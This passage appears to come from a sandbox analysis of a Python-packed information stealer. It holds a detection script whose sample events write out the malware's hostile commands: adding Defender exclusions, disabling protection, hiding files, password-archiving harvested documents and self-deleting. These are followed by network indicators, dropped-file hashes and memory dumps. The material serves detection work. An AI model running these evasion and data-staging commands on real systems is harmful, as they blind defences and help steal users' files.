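    ProcEvent(3520, 3468, CMD, via_cmd('attrib +h +s "' + ZYRON + '"')),
    ProcEvent(2552, 3468, CMD, via_cmd(EXCLUDE % ZYRON)),
    ProcEvent(1008, 2552, PS, EXCLUDE % ZYRON),
    ProcEvent(4412, 3468, CMD, via_cmd(DISABLE)),
    ProcEvent(3232, 3468, CMD, via_cmd(EXCLUDE % INVISIBLE_SCR)),
    ProcEvent(3952, 3468, CMD, via_cmd(TEMP + r'\_MEI25842\rar.exe a -r -hp"Tookie57!" "' + TEMP + r'\9ZHOu.zip" *')),
    ProcEvent(3112, 3468, CMD, via_cmd('ping localhost -n 3 > NUL && del /A H /F "' + ZYRON + '"')),
    ProcEvent(5080, 2256, r"C:\Windows\system32\tasklist.exe", "tasklist /FO LIST"),
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, techniques_for(hits), hits)
```

Feed real Sysmon/4688 records into ProcEvent and call scan(); the lineage rule is what separates this tree from an administrator typing the same attrib or Set-MpPreference commands by hand. On a host where the Set-MpPreference line ran, also read the current state back with Get-MpPreference, because a successful change leaves no further process-creation trace.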

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-ukuzh.in udp
US 208.95.112.1:80 ip-api.com tcp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.137.232:443 discord.com tcp

Files

memory/4996-0-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zyron.exe 

MD5 6b9890a680fb22f32d8318ca466145ad
SHA1 69380599cb62403138660cb08c59ece67dc3d388
SHA256 00a2dcab663ed13d838b665b3db093bcc44c610399148a9f643c044c1f90aca9
SHA512 565ce693948c92741c94793e82625bc92c42c407d496519205f475b12131d55e224b21571c0c173507a2a2a4382d2b4d2c0e4a3ad7cba374fa82d79001e5058c

C:\Users\Admin\AppData\Local\Temp\_MEI25842\python312.dll

MD5 2f1072ddd9a88629205e7434ed055b3e
SHA1 20da3188dabe3d5fa33b46bfe671e713e6fa3056
SHA256 d086257a6b36047f35202266c8eb8c1225163bd96b064d31b80f0dbe13da2acf
SHA512 d8dddc30733811ed9a9c4ae83ac8f3fc4d8ba3fa8051d95242fbd432fd5bf24122373ac5eea9fec78f0daf7c1133365f519a13cf3f105636da74820a00a25e9b

C:\Users\Admin\AppData\Local\Temp\_MEI25842\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/3468-35-0x00007FFF43940000-0x00007FFF44018000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI25842\base_library.zip

MD5 ccee0ea5ba04aa4fcb1d5a19e976b54f
SHA1 f7a31b2223f1579da1418f8bfe679ad5cb8a58f5
SHA256 eeb7f0b3e56b03454868411d5f62f23c1832c27270cee551b9ca7d9d10106b29
SHA512 4f29ac5df211fef941bd953c2d34cb0c769fb78475494746cb584790d9497c02be35322b0c8f5c14fe88d4dd722733eda12496db7a1200224a014043f7d59166

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_ctypes.pyd

MD5 1b06133298f03ff20e5d31cb3b0bca63
SHA1 0678e26f8d03e2ea0ba8d78d6d14809914d9c0a8
SHA256 e92c373cc790a5411681a78ade2b75ecb03f3cf17aab7d98c0fb3afa2254684d
SHA512 18c50a5ff69c0c7e19c27039eda0cade0e8bc8d617cca4bc8981dc8a519fa86a05a86b0662aaa493604e9801edf6a41ee65336332b715188e5e17a60a8154cbc

memory/3468-40-0x00007FFF58770000-0x00007FFF58795000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI25842\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI25842\sqlite3.dll

MD5 5655f540da3e3bd91402e5e5b09a6d2f
SHA1 d44db47026b330d06fa84128fd9f0241f5752011
SHA256 aa05807dfa35d6fbe1484728110430802a791f3f8723f824696f2d6bd9c5b69a
SHA512 1205dcd5657dcc457f8d02452c47fcb2e7fee108a675aaddc9f7b82d1f2371e38080a6fa0f767524f835c544f129b6f71b2d716180d196b18a9a6dbef6c9bf03

memory/3468-58-0x00007FFF5ED70000-0x00007FFF5ED7F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_ssl.pyd

MD5 7b0d6d717535bc48f0176fd6455a133b
SHA1 a3fd5e6495d961eeaa66ccb7b2a8135812210356
SHA256 3e2d13bda93c59fdd1b9bbb2b30c682774e8da4503248e96e0e3c1b0fe588ce7
SHA512 861443c982a821f61bd971f57f65998366f325d084f21636e38f91aaaac752e7dc2b2344f414db3cb7fddec08210cfc197c1815a44e9b726ff5eabe2c62f42f9

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_sqlite3.pyd

MD5 a045491faa0cba94b3230b254db7f2d2
SHA1 11a87b7f872e24bab0b278bd88c514b5788975b1
SHA256 79769e9318b6e525a145293affedc97b5e7a2e994c88f9df445b887df75f92ee
SHA512 a279306e78f34feed13dedd7ecedd226304d5f06746a14c0f9759a7191953de6409b244d23629b25fe9c4a374528ffc6ac92bd1090e218ee5962815491fdcb43

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_socket.pyd

MD5 cd2becb9c6dc5cc632509da8cbd0b15d
SHA1 28a705e779ed0e40651875cb62fa8e07d3e27e10
SHA256 2a56f2fdbd69a386924d2c00266f1a57954e09c9eb022280be713d0c6ef805ce
SHA512 fb22b719d4db4c50ab11984ba1bef29a2154d3f2a283b9fa407fd5ec079b67bedf188d5bb94b45b3d18e9000dce11ebf8bb3cd35d465ccbe49c54e150d21a62a

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_queue.pyd

MD5 a56e79b7526129f06c4feacf1f8ed117
SHA1 99f4b0e65c01604f1f5beaff1c0549b1c5a807c5
SHA256 dff778a28f75ea484a8e2e91c31235eb8d44128f5ace83491e4fbe923addffad
SHA512 b1f1fee24e1041424e5e05e2087440a6b9eb79ab57367d6f83fa83c6a39c7eb693d6edac9a7ac1c22a26109014fb4a12ef31b33775b23e857afeca777ae0bbcb

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_lzma.pyd

MD5 cf374ecc905c5694986c772d7fc15276
SHA1 a0ee612388a1c68013f5e954e9280ba0db1bd223
SHA256 d94c8b2004a570d0f3b1cfd0333e4b1a82696fe199a1614d9054f8bfef4ba044
SHA512 0074b3e365782721de8d0a6ee4aa43871d9498eae07a24443b84b755fa00ec3335e42aedeefed0499e642bde9f4ad08843f36b97e095ef212ec29db022676a42

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_hashlib.pyd

MD5 ee8c405267c3baaa133e2e8d13b28893
SHA1 b048112268f8300b3e47e441c346dea35e55d52a
SHA256 462b55ca1a405cf11a20798cf38873a328d3720bbd9e46242ce40a5bc82f47d1
SHA512 da290e352fa759414bbfa84d1c213be9c5722f5b43ab36ae72ea816e792a04e9aaa5253b935d6acdc34611f0ef17c2c0e8d181d014ce3cb117b5775e406f820a

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_decimal.pyd

MD5 a6102e46e07e1219f90392d1d89ac4d6
SHA1 425375d377fde63532aa567978c58a1f131a41b1
SHA256 572116a1ecdc809846f22d3ccd432326a7cff84969aa0de5a44e1fbe4c02bcf7
SHA512 27bad2fd9b9953798b21602f942228aae6cec23cac1c160a45c4a321f1d0151ce245a82cceb65bfcd7412b212cb19e44fff3b045d7f3bedac49ff92d1c4affa6

C:\Users\Admin\AppData\Local\Temp\_MEI25842\_bz2.pyd

MD5 2152fe099ca3e722a8b723ea26df66c6
SHA1 1daaaba933501949e5d0e3d3968f4279dcde617d
SHA256 41eb95b13a115594ca40eacbb73b27233b7a8f40e9dbfbc597b9f64f0a06b485
SHA512 5168f3c554ba8f6c1d923a047ca6784c106b56b8e1944113059190e2a9c19bd8722f14106ea7300ab222696e5164ee66d857b5d619328dd29bbb27943b073cf9

C:\Users\Admin\AppData\Local\Temp\_MEI25842\unicodedata.pyd

MD5 20f206b5b405d837c201b8fb443cfa5a
SHA1 f06b062505f7218d49a1ef0ea65c6212dc4105b0
SHA256 0ae76f7316506bcaa4a59f31817569129fd1baaaba89032953785dbf9f7a7242
SHA512 b36e4af96bef6b8c13d509b66c34f1cdf6ac8830267fabc13a811d7d486d938d798b32b4d195fea762ee550501002674d6681f8985318990b454a5bc5c982088

C:\Users\Admin\AppData\Local\Temp\_MEI25842\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI25842\select.pyd

MD5 79bb09417365e9b66c8fb984cbb99950
SHA1 517522dbcbefb65e37e309cb06fed86c5f946d79
SHA256 94f2bac05e32cb3791f66efb3229c932ab71bc3725a417340304219721b0d50d
SHA512 1c2129dd4d8febe2886e122868956ba6032a03b1297da095d3e9c02ab33183d964a8f790086e688b0720ab39aa1e8d0fe91fadbbe99035baf4d7cc5754de9e64

C:\Users\Admin\AppData\Local\Temp\_MEI25842\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI25842\libssl-3.dll

MD5 6eda5a055b164e5e798429dcd94f5b88
SHA1 2c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256 377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA512 74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

C:\Users\Admin\AppData\Local\Temp\_MEI25842\libcrypto-3.dll

MD5 27515b5bb912701abb4dfad186b1da1f
SHA1 3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256 fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512 087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

C:\Users\Admin\AppData\Local\Temp\_MEI25842\blank.aes

MD5 7ce138b2c0b8689475c61d3fa5ece79a
SHA1 70d12f62b136392be850260059a2db6a97e3da58
SHA256 8a4badcec2c7ec8379068eac2711228992745be2effc8b6fa212a1e8d315bfcc
SHA512 6f7a66cfcb860f92b74c4bbc50285a20d6cf14399eae345ca8ccf1fae4377d4f618e6634ba337e1e4e7de21c6b34af589ce8b16293ef85780797c70357122cfb

memory/3468-64-0x00007FFF58740000-0x00007FFF5876D000-memory.dmp

memory/3468-70-0x00007FFF54D50000-0x00007FFF54EC6000-memory.dmp

memory/3468-69-0x00007FFF58710000-0x00007FFF58734000-memory.dmp

memory/3468-67-0x00007FFF5ED10000-0x00007FFF5ED29000-memory.dmp

memory/3468-72-0x00007FFF5A790000-0x00007FFF5A7A9000-memory.dmp

memory/3468-81-0x00007FFF54C80000-0x00007FFF54D4D000-memory.dmp

memory/3468-80-0x00007FFF586D0000-0x00007FFF58703000-memory.dmp

memory/3468-83-0x000001E09D2D0000-0x000001E09D7F2000-memory.dmp

memory/3468-86-0x00007FFF5A6A0000-0x00007FFF5A6B4000-memory.dmp

memory/3468-87-0x00007FFF59450000-0x00007FFF5945D000-memory.dmp

memory/3468-90-0x00007FFF54AE0000-0x00007FFF54BFB000-memory.dmp

memory/3468-89-0x00007FFF58770000-0x00007FFF58795000-memory.dmp

memory/3468-82-0x00007FFF43410000-0x00007FFF43932000-memory.dmp

memory/3368-100-0x0000019E6F3E0000-0x0000019E6F402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vynxyoog.z2r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3468-79-0x00007FFF43940000-0x00007FFF44018000-memory.dmp

memory/3468-74-0x00007FFF5EB70000-0x00007FFF5EB7D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa4f31835d07347297d35862c9045f4a
SHA1 83e728008935d30f98e5480fba4fbccf10cefb05
SHA256 99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0
SHA512 ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a77929cd0f9b956d2141b3ec56cbf856
SHA1 8914eaa86d030e28bf0e2cf53d8decdeee8f768c
SHA256 429228741fd395c7dfaaf230da4c25aefec432f9f3e09dfdd01f7ebc2035dd1b
SHA512 3c383f08f7e94816a0099a8042d6bd47292eb1ca23a5e519ab994a9ccce66664586d8d7f16722c289e3004de5f6f656482b703710ff4a2e25c0edd6f8188a254

\??\c:\Users\Admin\AppData\Local\Temp\wywphiwm\wywphiwm.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\wywphiwm\wywphiwm.cmdline

MD5 6adefd68020d1ece5b15ed7991002c58
SHA1 be318f057eeb48e6fc12001254b621c6bf297b8d
SHA256 fa023c25caa3ac3453eb9f3cce59bde568dbe8bb3ab6f7eb03a671727df45105
SHA512 73333872b7f738d63fdd6fd1fb57ca0cc980789c3c622f3e94f9b5f0afc9261caa0bb4036e57855732be6bd48356aa82a8642c213c873556225f8bbfe548329e

\??\c:\Users\Admin\AppData\Local\Temp\wywphiwm\CSC923901C5E42B49448D1793F52EDD9E9.TMP

MD5 421522c2dd985dd258a8beb6d0a5fd38
SHA1 6b99784847414470d0fa44308caee217829bfd7b
SHA256 c501def2fedb9730a93a5ac49b4f2772033ae8173a70ce3bf48ad0da14dd9da9
SHA512 9195f07e0967c41c68f1774ceb456cf6d6319988aaff739288c45f6446a1886a9c679daa4946b0fbd7794054dbb501d9723383ade44e5ec9ff27d6ab1de22686

C:\Users\Admin\AppData\Local\Temp\RES6AFE.tmp

MD5 b689c0af5d7b188175a1de2d26eb0bcd
SHA1 385b36b02ca9f9deb70de1db864ce3a930f28354
SHA256 a8df09ca6457fb847aa80eaabd6e9a831d3378093db79b3e33df84fda3c25894
SHA512 a3adc67a58b794df1c06f316a3898ebf347be780366790cad6be370750828c65df94e59cf5a89866d9f9126074ed489c475f5e742c43071cc9b0602b446ed01c

C:\Users\Admin\AppData\Local\Temp\wywphiwm\wywphiwm.dll

MD5 c03a829dbc2fc7d60d554b958cd46e26
SHA1 4e9a656f0032f0bfa4c8b0bf73d4ef022ab3f0c6
SHA256 daa351226accb42f1b79498ca736b081039170af965998838e939fc7b9991a9f
SHA512 9339c8c664079cf3f6ce2098afcb3f517c5ac45ea1a5b6f5d708f260e464c1fe45f1d5a1b65cec1d526c1ad32ea18abca546d08833fe5a617f10aadc29a152be

memory/724-208-0x00000238333B0000-0x00000238333B8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2300867e9fc7247f3ee01d6a610b09bb
SHA1 082db2fa341eef1caa595686f60ff5bebc1be068
SHA256 197636b8559e41fc8edf110ae9021a1a49163fbe235a46b9ef7fa75a2013fb09
SHA512 5660891b57f45f5dfcb5f2d2c640ba565a275ca9892323b70495fb737616a92f1c26cfde1db2dc26decf0e5772e9170d52ac775602ffe1524760b4dc45fd7669

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7332074ae2b01262736b6fbd9e100dac
SHA1 22f992165065107cc9417fa4117240d84414a13c
SHA256 baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA512 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Desktop\PingSearch.mp4

MD5 b0863450915dfe80de24d94501e476ed
SHA1 36d8bb081fb6a62fab4330e8c6cd0d9ee9a319dc
SHA256 7404d87361a013cc9c5344d59726a0731f04c0b5fea83db40b055dac7256fdef
SHA512 cab44cbdc462621a5c0c27b1918bebc4feddf4e9fa1490e2ddbbefe86479c65035f3cd908098e3d3f6dbf8a0206c3fec2cd015475f48ae78c2a2295227cbc186

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Desktop\PushShow.pdf

MD5 949ac9c0f386b048711467a9c038ba2a
SHA1 99bcd5cdd5bdf227429c6b9a1aa095dd0acd1650
SHA256 59f9e6c34e4e15ac51e82032c67c666fcacde362f7c754fbc7365e244fbeb30b
SHA512 aabe3b722d66945bd2d5b1a53dd452010d19eb90da66121e08e2cdf10d7413eb1aa1b247eec8f67484d02f360e9c217a625db5cc011d32ccec9eccfccbdd624a

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Desktop\RequestLock.png

MD5 b56fcd9c74e7de89ba5f50126fd6cc38
SHA1 b6acfcb248c4db9caa3cdb48b6bdcd71fb5d3567
SHA256 10c8f14a671ac0ebd334c5363c8735f6736955f3f1bdece39349e446e50a85bf
SHA512 1541cb4822977d7dfbfeca099c1ea349310ddf1ad202dd253ae16a3963c6e5cb03d53191c06c8debdaca5d6b645f5ec43e26a3b4064c237d75f6393b9960ab18

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Desktop\SkipUninstall.mp3

MD5 71f7bca979b6b314a4a4454c565d3048
SHA1 1cee10c82e516319c050da50e1ca75404cf2d84a
SHA256 c54285987193e3f72f986f318d4c9b3f4b6c8aa75e104eefd57b5da120335b42
SHA512 67a1e5e8a37af99d38c0666d33702cba0783eeda513aadcab2c3e87f0b19d11692563433ade9b33fc8813728f029bc9809f305d7badc6e3cecf819df10ab1120

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\DisableSet.txt

MD5 d769711bc7ec7607fb63c97949df9251
SHA1 3f3b711a86a86cc535905abf8438cd67d93b5859
SHA256 696646837785f7589382845de0d4e21b91e1adb5d4643304442d0813422ac16b
SHA512 89bd48ededd3b4f2efd099fb63a383d4508d27c9dc10ca358001b83f6d1314f11adf8b5cf98d64f985564a85e9c980aff573f65179c156271ee34c6970fa3fd2

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\DisableSwitch.pdf

MD5 0a995650e351fe10fab0da147a9737d0
SHA1 4d3c856c556aef4e0b098c4fee75f6922ffc773d
SHA256 37767de1c8ced6bc375a019d85e3fabb41e0831194842e5d495ab15247d5c5a7
SHA512 403f918d6b1ae635eb0e7db51024ea15ede7b269f317e753a27ceeabbe460ee55dab81ef18c11ab11e9a406214eb61dc20b71b7bd708281372515bf6b767e21f

memory/3468-276-0x00007FFF58740000-0x00007FFF5876D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\      ​‎ ‎\Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

memory/3468-300-0x00007FFF58770000-0x00007FFF58795000-memory.dmp

memory/4048-316-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3468-315-0x00007FFF54D50000-0x00007FFF54EC6000-memory.dmp

memory/3468-314-0x00007FFF58710000-0x00007FFF58734000-memory.dmp

memory/3468-310-0x00007FFF43410000-0x00007FFF43932000-memory.dmp

memory/3468-309-0x00007FFF54C80000-0x00007FFF54D4D000-memory.dmp

C:\Windows\Resources\Themes\explorer.exe

MD5 dd12727f6eef5896f8b6424e3e45d73e
SHA1 d1fdde2cfcc0f5cea9b796029fc3a6c4e3a49a43
SHA256 1f94a11fb992878c244b93ccd7fceae27b6ba02f19630fce3321d4f28211810d
SHA512 37acb4df212a261900eb42338ac410f9fb8b76a82cd09d8a7a9a9fdcf4726fd8f8a338d3f70836b0bea1f17509fb0da936e744b634bb8424bb22833f7d344c7d

memory/3468-308-0x00007FFF586D0000-0x00007FFF58703000-memory.dmp

memory/3468-299-0x00007FFF43940000-0x00007FFF44018000-memory.dmp

memory/3468-313-0x00007FFF54AE0000-0x00007FFF54BFB000-memory.dmp

memory/4184-335-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3468-334-0x000001E09D2D0000-0x000001E09D7F2000-memory.dmp

memory/1620-343-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4184-344-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4048-345-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4996-346-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3468-364-0x00007FFF58770000-0x00007FFF58795000-memory.dmp

memory/3468-368-0x00007FFF54D50000-0x00007FFF54EC6000-memory.dmp

memory/3468-367-0x00007FFF5ED10000-0x00007FFF5ED29000-memory.dmp

memory/3468-366-0x00007FFF58740000-0x00007FFF5876D000-memory.dmp

memory/3468-365-0x00007FFF5ED70000-0x00007FFF5ED7F000-memory.dmp

memory/3468-361-0x00007FFF54AE0000-0x00007FFF54BFB000-memory.dmp

memory/3468-359-0x00007FFF5A6A0000-0x00007FFF5A6B4000-memory.dmp

memory/3468-358-0x00007FFF43410000-0x00007FFF43932000-memory.dmp

memory/3468-356-0x00007FFF586D0000-0x00007FFF58703000-memory.dmp

memory/3468-355-0x00007FFF5EB70000-0x00007FFF5EB7D000-memory.dmp

memory/3468-354-0x00007FFF5A790000-0x00007FFF5A7A9000-memory.dmp

memory/3468-347-0x00007FFF43940000-0x00007FFF44018000-memory.dmp

memory/3468-363-0x00007FFF58710000-0x00007FFF58734000-memory.dmp

memory/3468-362-0x00007FFF59450000-0x00007FFF5945D000-memory.dmp

memory/3468-357-0x00007FFF54C80000-0x00007FFF54D4D000-memory.dmp